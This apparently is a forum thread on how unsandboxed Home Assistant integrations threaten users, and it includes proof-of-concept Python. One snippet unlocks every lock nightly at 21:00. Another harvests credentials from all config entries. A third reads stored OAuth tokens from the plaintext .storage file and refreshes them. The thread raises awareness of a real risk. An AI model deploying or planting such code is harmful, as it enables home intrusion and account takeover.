I am wondering about the security of using external integrations, e.g. from the community store. Is there anything that prevents integrations from “just doing what they want”?
For example, could an integration from the community store simply contain an automation which sends unlock commands for known smart lock brands at 9 PM, hoping that this particular household happens to contain such a lock?
Yes, it could. Now, nobody has any clue where you live, so that’s of limited use for actual thieves. It could also send that information to some external site, though.
Your only safety barrier is the ability to read the code (and community trust).
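To make the hypothetical concrete, here is a minimal sketch of what such a custom integration could contain. The integration name, entity target and schedule are invented, but `async_track_time_change` and `hass.services.async_call` are the ordinary, unrestricted helpers that every integration gets:

```python
"""Illustrative sketch of custom_components/totally_innocent/__init__.py (name made up)."""
from homeassistant.core import HomeAssistant
from homeassistant.helpers.event import async_track_time_change


async def async_setup(hass: HomeAssistant, config: dict) -> bool:
    """Set up what looks like a harmless integration."""

    async def _at_nine_pm(now) -> None:
        # Nothing stops integration code from calling any service on any
        # entity, including every lock in the house.
        await hass.services.async_call(
            "lock", "unlock", {"entity_id": "all"}, blocking=False
        )

    # Fire every day at 21:00 local time.
    async_track_time_change(hass, _at_nine_pm, hour=21, minute=0, second=0)
    return True
```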
Unless this same code is able to send the lat/lon of zone ‘home’ to the outside?
Aside from the security vs. locks angle, there are probably other risks too, as one installs things quite easily and afaik this bypasses any virus/intrusion/etc. scanner.
EDIT: unless I totally missed it, it may be a good idea to write a chapter on security/risks/etc.
You. You are the only thing between your HA instance and an integration… Integrations install in the HA code space and become part of your HA install. That means there is zero internal security boundary and you need to do your own review/analysis of the integration code (posted in its repo).
Do most people do it? Admittedly, no. But that’s the model. Look before you leap and pay close attention to what integrations you install.
Keep in mind that this is not specific to custom integrations: any integration can do harmful things, since we require every integration to keep its business logic in an external API library, and that library’s code lives outside Home Assistant itself.
By the way, any integration can access any other integration’s configuration (username, password, OAuth key, etc.).
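To illustrate, a minimal sketch of how integration code can walk every other integration’s stored config entry data, assuming it runs somewhere with access to the `hass` object (e.g. inside an integration’s setup); the list of “interesting” key names is just an example:

```python
from homeassistant.core import HomeAssistant

# Example key names only; real entries differ per integration.
INTERESTING = ("username", "password", "token", "api_key", "client_secret")


def dump_other_integrations_secrets(hass: HomeAssistant) -> dict:
    """Collect credential-looking fields from every config entry on the instance."""
    loot = {}
    for entry in hass.config_entries.async_entries():  # all domains, no permission check
        found = {key: entry.data[key] for key in INTERESTING if key in entry.data}
        if found:
            loot[f"{entry.domain} ({entry.title})"] = found
    return loot
```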
I’m definitely not an expert on this, but I have heard others say that this is not the security risk you think it is. The key is used once to set up the connection and cannot be reused. At least that is what I took from the discussion.
Yeah. Python itself is a nightmare as far as code segregation/segmentation/sandboxing goes.
Every bit of code can go anywhere in the Python virtual machine, basically.
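A plain-Python illustration of that, no Home Assistant involved: once two modules live in the same interpreter, either one can read and even rewrite the other’s state.

```python
import sys
import types

# Simulate an already-imported "victim" module that holds a secret.
victim = types.ModuleType("victim")
victim.API_KEY = "s3cr3t"          # notionally private to the victim
sys.modules["victim"] = victim

# Any other code running in the same interpreter can simply look it up...
print(sys.modules["victim"].API_KEY)        # -> s3cr3t

# ...or monkey-patch the "victim" after the fact.
sys.modules["victim"].API_KEY = "whatever the attacker wants"
```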
There is no such thing as an “oauth key”.
You have client id/secrets, access tokens and refresh tokens.
The access token is what is used to access the resources, so if a long-lived one leaks, you are screwed.
The client id/secret is what is used to get the initial access/refresh tokens, so if those are leaked, you are screwed.
Refresh tokens are longer-lived than access tokens and are used to get new access tokens (unless the refresh token has been found to be leaked and revoked). If those are unknowingly leaked, you are screwed.
So yeah, quite a big deal, really.
Worse, all of that information sits in plain, unencrypted sight in .storage.
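To spell that out, here is a rough sketch assuming a typical OAuth-based config entry; the exact file layout, key names and the token endpoint below are assumptions that vary per integration and provider. Anything that can read the config directory can lift the refresh token and keep minting new access tokens:

```python
import json

import requests  # stand-in HTTP client for the refresh call

# Config entries (including OAuth token dicts) are stored as plain JSON.
# The path and structure shown follow the common pattern; details vary.
with open("/config/.storage/core.config_entries") as f:
    entries = json.load(f)["data"]["entries"]

# Pick the first entry that carries an OAuth token dict.
token = next(
    e["data"]["token"]
    for e in entries
    if isinstance(e.get("data"), dict) and "token" in e["data"]
)
print("leaked refresh token:", token["refresh_token"])

# With the refresh token (plus client id/secret where the provider requires
# them), fresh access tokens can be requested at will. The token URL,
# CLIENT_ID and CLIENT_SECRET are placeholders.
resp = requests.post(
    "https://provider.example.invalid/oauth2/token",
    data={
        "grant_type": "refresh_token",
        "refresh_token": token["refresh_token"],
        "client_id": "CLIENT_ID",
        "client_secret": "CLIENT_SECRET",
    },
    timeout=10,
)
print("new access token:", resp.json().get("access_token"))
```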
Bottom line: currently, HA is a security nightmare.
Redirect URIs are defined in the application on the server side; an example integration is Home Connect.
If the request doesn’t arrive from myha.duckdns.org, it is not executed. And at the end, it redirects the user to the specified callback URL and nowhere else.
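For context, that check is part of the standard Authorization Code flow: the client puts its redirect_uri in the authorization request, and the provider only delivers the authorization code if it exactly matches a URI registered for that client id. A small sketch with placeholder values (the URLs and client id are made up, not real Home Connect endpoints):

```python
from urllib.parse import urlencode

# All values below are placeholders.
AUTHORIZE_URL = "https://provider.example.invalid/oauth2/authorize"
REGISTERED_REDIRECTS = {"https://myha.duckdns.org/auth/external/callback"}  # registered at the provider

params = {
    "response_type": "code",
    "client_id": "CLIENT_ID",
    "redirect_uri": "https://myha.duckdns.org/auth/external/callback",
    "state": "random-opaque-value",
}
print(f"{AUTHORIZE_URL}?{urlencode(params)}")

# The provider compares the requested redirect_uri against the registered
# ones and refuses to deliver the authorization code anywhere else.
# (Simulated locally here; in reality this check runs on the server.)
assert params["redirect_uri"] in REGISTERED_REDIRECTS
```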
I’m not skilled enough to read through all the code looking for potential issues. But I am skilled enough to capture and analyze the network traffic (Wireshark) from/to HA or any other device on my network. Then I can use firewall rules to control that traffic.
Yep, but that’s only for the “Authorization Code” OAuth2 flow (a flow is basically “how to get the tokens”), and only to obtain the access and refresh tokens.
Once those are stored in HA, they are “hackable” at will until both tokens expire. You’ll notice that the tokens have expired when the integration asks you to log in again, if that ever happens.
Then again, the integration tells you to use https://my.home-assistant.io/redirect/oauth as the callback URL, which goes through the My Home Assistant redirect, which (again) amounts to zero security at all if the client id/client secret is leaked.